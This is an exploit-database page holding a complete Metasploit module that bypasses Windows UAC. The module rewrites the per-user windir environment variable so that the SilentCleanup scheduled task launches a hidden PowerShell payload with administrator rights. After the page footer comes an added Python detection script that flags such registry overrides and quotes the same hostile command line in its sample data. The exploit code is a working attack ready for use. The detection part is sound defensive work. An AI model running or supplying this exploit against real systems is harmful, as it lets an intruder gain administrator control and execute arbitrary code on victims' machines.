0day.today - Biggest Exploit Database in the World.
Windows Escalate UAC Protection Bypass Via SilentCleanup Exploit
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::Powershell
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Windows Escalate UAC Protection Bypass (Via SilentCleanup)',
      'Description'    => %q{
        There's a task in Windows Task Scheduler called "SilentCleanup" which,
        while it's executed as Users, automatically runs with elevated privileges.
        When it runs, it executes the file %windir%\system32\cleanmgr.exe.
        Since it runs as Users, and we can control user's environment variables,
        %windir% (normally pointing to C:\Windows) can be changed to point to
        whatever we want, and it'll run as admin.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'tyranid',                  # Discovery
        'enigma0x3',                # Discovery
        'nyshone69',                # Discovery
        'Carter Brainerd (cbrnrd)'  # Metasploit Module
      ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter', 'shell'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'Targets'        => [['Microsoft Windows', {}]],
      'DisclosureDate' => 'Feb 24 2019',
      'References'     => [
        ['URL', 'https://tyranidslair.blogspot.com/2017/05/exploiting-environment-variables-in.html'],
        ['URL', 'https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/'],
        ['URL', 'https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/'],
        ['URL', 'https://forums.hak5.org/topic/45439-powershell-real-uac-bypass/']
      ]
    ))

    register_options(
      [
        OptInt.new('SLEEPTIME', [false, 'The time (ms) to sleep before running SilentCleanup', 0]),
        OptString.new('PSH_PATH', [true, 'The path to the Powershell binary.', "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"])
      ])
  end

  def get_bypass_script(cmd)
    scr = %Q{
      if((([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match "S-1-5-32-544")) {
        #{cmd}
      }
      else {
        $registryPath = "HKCU:\\Environment"
        $Name = "windir"
        $Value = "powershell -ExecutionPolicy bypass -windowstyle hidden -Command `"& `'$PSCommandPath`'`";#"
        Set-ItemProperty -Path $registryPath -Name $name -Value $Value
        #Depending on the performance of the machine, some sleep time may be required before or after schtasks
        Start-Sleep -Milliseconds #{datastore['SLEEPTIME']}
        schtasks /run /tn \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I | Out-Null
        Remove-ItemProperty -Path $registryPath -Name $name
      }
    }
    vprint_status(scr)
    scr
  end

  def exploit
    check_permissions

    e_vars = get_envs('TEMP')
    payload_fp = "#{e_vars['TEMP']}\\#{rand_text_alpha(8)}.ps1"

    # Write it to disk, run, delete
    upload_payload_ps1(payload_fp)
    vprint_good("Payload uploaded to #{payload_fp}")
    cmd_exec("#{expand_path(datastore['PSH_PATH'])} -ep bypass #{payload_fp}")
  end

  def check_permissions
    # Check if you are an admin
    case is_in_admin_group?
    when nil
      print_error('Either whoami is not there or failed to execute')
      print_error('Continuing under assumption you already checked...')
    when true
      print_good('Part of Administrators group! Continuing...')
    when false
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
    end

    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
    end
  end

  def upload_payload_ps1(filepath)
    pld = cmd_psh_payload(payload.encoded,
                          payload_instance.arch.first,
                          encode_final_payload: true,
                          remove_comspec: true)
    begin
      vprint_status('Uploading payload PS1...')
      write_file(filepath, get_bypass_script(pld))
      register_file_for_cleanup(filepath)
    rescue Rex::Post::Meterpreter::RequestError => e
      fail_with(Failure::Unknown, "Error uploading file #{filepath}: #{e.class} #{e}")
    end
  end
end
```

# 0day.today [2024-11-15] #
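The module's whole trick rests on one observable: a user-scope `windir` value written to `HKCU\Environment` (the system-scope `windir` lives under the HKLM Session Manager key, so a per-user copy is always anomalous), and that value is a command line rather than a directory. The following detection check is an added example, not part of the page or of the Metasploit module. It parses `reg query`-style output and Sysmon-shaped registry value-set records (Event ID 13; the `EventID`, `TargetObject`, `Details` field names are assumed to match Sysmon's) and flags per-user definitions of system-scope variables. All sample input is constructed for the example. Because the script removes the value right after `schtasks /run`, a point-in-time registry scan can miss it; the event-based check is the one to rely on.

```python
import re
from typing import Dict, List, Optional

# System-scope variables that a per-user Environment key should never define.
# A user-scope copy shadows the system value for processes that build their
# environment block from the user's profile, which is what the module abuses.
SYSTEM_SCOPE_VARS = {"windir", "systemroot", "comspec", "systemdrive"}

# Substrings that mark a value as a command line instead of a directory path.
COMMAND_MARKERS = ("powershell", "cmd", "-command", "-executionpolicy",
                   "-ep ", ".exe", "&", '"', "'")

# One value line of `reg query <key>`: <4 spaces><name><spaces><REG_type><spaces><value>
REG_LINE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<value>.*)$")
# Last path component of a registry TargetObject under an Environment key.
ENV_TARGET = re.compile(r"\\Environment\\(?P<name>[^\\]+)$", re.IGNORECASE)

# Constructed sample: what `reg query HKCU\Environment` might print on a host
# while the module's PowerShell stage is mid-run (the windir line is the hijack).
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Environment
    Path    REG_EXPAND_SZ    C:\Users\alice\AppData\Local\Microsoft\WindowsApps
    TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    windir    REG_SZ    powershell -ExecutionPolicy bypass -windowstyle hidden -Command "& 'C:\Users\alice\AppData\Local\Temp\abcdefgh.ps1'";#
"""

# Constructed sample events shaped like Sysmon Event ID 13 (RegistryEvent, value set).
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\TEMP",
     "Details": r"%USERPROFILE%\AppData\Local\Temp"},
    {"EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Environment\windir",
     "Details": "powershell -ExecutionPolicy bypass -windowstyle hidden -Command \"& 'C:\\Users\\alice\\AppData\\Local\\Temp\\abcdefgh.ps1'\";#"},
    {"EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Control\Session Manager\Environment\windir",
     "Details": r"C:\Windows"},  # legitimate system-scope location, must not fire
    {"EventID": 1, "TargetObject": "", "Details": ""},  # unrelated process-create event
]


def parse_reg_query(text: str) -> Dict[str, Dict[str, str]]:
    """Parse `reg query` output for a single key into {name: {type, value}}.
    Value names containing spaces are not handled; the Environment key has none."""
    entries: Dict[str, Dict[str, str]] = {}
    for line in text.splitlines():
        m = REG_LINE.match(line)
        if m:
            entries[m.group("name")] = {"type": m.group("type"),
                                        "value": m.group("value").rstrip()}
    return entries


def classify(name: str, value: str) -> Optional[str]:
    """Severity for a per-user variable, or None if the name is not system-scope.
    Any user-scope definition is anomalous; one that looks like a command is worse."""
    if name.lower() not in SYSTEM_SCOPE_VARS:
        return None
    low = value.lower()
    return "high" if any(tok in low for tok in COMMAND_MARKERS) else "medium"


def review_user_environment(entries: Dict[str, Dict[str, str]]) -> List[Dict[str, str]]:
    """Point-in-time check over parsed HKCU\\Environment values."""
    findings = []
    for name, meta in entries.items():
        sev = classify(name, meta["value"])
        if sev:
            findings.append({"name": name, "value": meta["value"], "severity": sev})
    return findings


def flag_registry_events(events: List[Dict[str, object]]) -> List[Dict[str, str]]:
    """Streaming check: value-set events on system-scope names under a user hive."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 13:
            continue
        target = str(ev.get("TargetObject", ""))
        # Only per-user hives are suspicious; HKLM\...\Session Manager\Environment
        # is where these variables legitimately live.
        if not target.upper().startswith(("HKU\\", "HKCU\\")):
            continue
        m = ENV_TARGET.search(target)
        if not m:
            continue
        sev = classify(m.group("name"), str(ev.get("Details", "")))
        if sev:
            findings.append({"name": m.group("name"), "target": target,
                             "value": str(ev.get("Details", "")), "severity": sev})
    return findings


if __name__ == "__main__":
    for f in review_user_environment(parse_reg_query(SAMPLE_REG_QUERY)):
        print("registry scan:", f)
    for f in flag_registry_events(SAMPLE_EVENTS):
        print("event stream:", f)
```

Feeding real `reg query HKCU\Environment` output or an exported Sysmon log into the two functions is the intended use; the medium/high split lets a hunt prioritise command-shaped values while still surfacing a plain directory override of `windir`, which has no legitimate per-user reason to exist.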